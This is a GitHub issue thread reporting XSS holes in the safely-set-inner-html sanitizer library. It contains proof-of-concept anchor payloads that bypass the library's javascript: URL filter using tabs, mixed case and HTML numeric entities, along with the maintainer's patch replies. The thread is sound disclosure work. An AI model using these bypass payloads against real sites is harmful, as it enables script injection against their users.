### ISSUE TITLE
JavaScript urls are allowed with anchors

### ISSUE THREAD

**Issue by hackvertor** [baptooo/safely-set-inner-html#16]
You only allow two tags yet still manage to have an XSS hole =)

```HTML
<a href='javascript:alert(1)'>test</a>
```

**Comment by baptooo** [comment]
Hello @hackvertor thank you very much for this one ! 👍

It is now fixed https://github.com/baptooo/safely-set-inner-html/commit/5e240208b1ef3625ac37beb4185453f661b339b8 and released to [v0.0.9](https://github.com/baptooo/safely-set-inner-html/releases/tag/v0.0.9)

**Comment by h3xstream** [comment]
Looking at [the regex](https://github.com/baptooo/safely-set-inner-html/commit/5e240208b1ef3625ac37beb4185453f661b339b8#diff-90a8efdf5af0828f812f5fc83a9e55edR34) (`value.match(/^( *)?javascript:/)`), I think there are at least 4 cases that can bypass this.

## Prepend non-printable character

Here are three variation with tabs
```html
<a href="	javascript:alert(1)">Tab Before</a>
```
```html
<a href="javascript	:alert(2)">Tab After</a>
```
```html
<a href="java	script:alert(3)">Tab Middle</a>
```
The same cases would work with newlines.

Suggestion : remove all invalid URL characters before applying the RegEx / validation.

## Case sensitivity

```html
<a href="javaScript:alert(5)">CamelCase</a>
```

Suggestion : Put every characters to lowercase prior applynig the RegEx / validation.

**Comment by baptooo** [comment]
Hi @h3xstream thank you very much for your help I will fix this soon :+1:

**Comment by baptooo** [comment]
@h3xstream Thank you for your help, I did update the href test in this release https://github.com/baptooo/safely-set-inner-html/releases/tag/v0.1.0

**Comment by hackvertor** [comment]
Hmmmm this is still vulnerable.

Examples:
```HTML
<a href="&#0;javascript:alert(1)">Pwnd</a>
<a href="&#1;javascript:alert(1)">Pwnd</a>
<a href="&#2;javascript:alert(1)">Pwnd</a>
<a href="&#3;javascript:alert(1)">Pwnd</a>
<a href="&#4;javascript:alert(1)">Pwnd</a>
```
...
etc
